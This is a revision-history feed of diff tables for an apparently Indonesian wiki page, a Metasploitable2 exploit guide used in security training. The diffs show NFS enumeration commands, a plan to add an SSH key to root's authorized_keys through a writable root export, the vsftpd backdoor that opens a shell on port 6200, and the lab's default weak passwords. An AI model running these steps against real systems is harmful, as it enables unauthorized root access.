&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below using &lt;/del&gt;rpcinfo &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;to identify NFS and showmount &lt;/del&gt;-&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;e to determine that the &amp;quot;/&amp;quot; share (the root of the file system) is being exported&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;You will need the rpcbind and nfs-common Ubuntu packages to follow along&lt;/del&gt;.&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; &lt;/ins&gt;rpcinfo -&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;p 192&lt;/ins&gt;.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;168.99&lt;/ins&gt;.&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;131&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt; root@ubuntu:~# rpcinfo -p 192.168.99.131&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     program vers proto   port  service&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;     program vers proto   port  service&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;      100000    2   tcp    111  portmapper&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;      100000    2   tcp    111  portmapper&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l97&quot; &gt;Line 97:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 100:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;      100005    3   tcp  39292  mountd    &lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;      100005    3   tcp  39292  mountd    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;root@ubuntu:~# &lt;/del&gt;showmount -e 192.168.99.131&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Show mount&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  showmount -e 192.168.99.131&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Export list for 192.168.99.131:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  Export list for 192.168.99.131:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  / *&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  / *&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new &lt;/del&gt;SSH key &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;on our &lt;/del&gt;attacking system, mount &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;the &lt;/del&gt;NFS export, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;and &lt;/del&gt;add &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;our &lt;/del&gt;key &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;to the &lt;/del&gt;root user &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;account's authorized_keys &lt;/del&gt;file:&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt; &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Generate &lt;/ins&gt;SSH key &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;di &lt;/ins&gt;attacking system, mount NFS export, add key &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;ke &lt;/ins&gt;root user &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;authorized key &lt;/ins&gt;file:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  root@ubuntu:~# ssh-keygen&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  root@ubuntu:~# ssh-keygen&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l124&quot; &gt;Line 124:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 131:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Backdoors==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Backdoors==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;On &lt;/del&gt;port 21, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Metasploitable2 runs vsftpd, a popular FTP server. This particular version contains a backdoor that was slipped into the source code by an unknown intruder. The &lt;/del&gt;backdoor &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;was quickly identified and removed, but not before quite a few people downloaded it&lt;/del&gt;. &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;If a username is sent that ends in the sequence :) [ a happy face ]&lt;/del&gt;, &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;the backdoored version will open a listening shell on port 6200. We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it:&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Metasploitable2, run vsftpd &lt;/ins&gt;port 21, &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;mengandung &lt;/ins&gt;backdoor. &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Berikut adalah caranya&lt;/ins&gt;,&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  root@ubuntu:~# telnet 192.168.99.131 21&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  root@ubuntu:~# telnet 192.168.99.131 21&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
	<entry>
		<id>https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=62080&amp;oldid=prev</id>
		<title>Onnowpurbo: /* Mutillidae */</title>
		<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=62080&amp;oldid=prev"/>
		<updated>2020-07-21T01:33:25Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Mutillidae&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;a href=&quot;https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;amp;diff=62080&amp;amp;oldid=62079&quot;&gt;Show changes&lt;/a&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
	<entry>
		<id>https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=62079&amp;oldid=prev</id>
		<title>Onnowpurbo: /* Weak Passwords */</title>
		<link rel="alternate" type="text/html" href="https://onnocenter.or.id/wiki/index.php?title=Metasploitable:_Exploit_Guide&amp;diff=62079&amp;oldid=prev"/>
		<updated>2020-07-21T01:26:56Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Weak Passwords&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 01:26, 21 July 2020&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l250&quot; &gt;Line 250:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 250:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Weak Passwords==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;==Weak Passwords==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. The primary administrative user msfadmin has a password matching the username. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. At a minimum, the following weak system accounts are configured on the system.&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Password &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;yang lemah di metasploitable&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Account Name&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Password&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;msfadmin&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; Username Password&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; &lt;/ins&gt;msfadmin &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;msfadmin&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; user     user&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; postgres postgres&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; sys      batman&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; klog     123456789&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; service  service&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
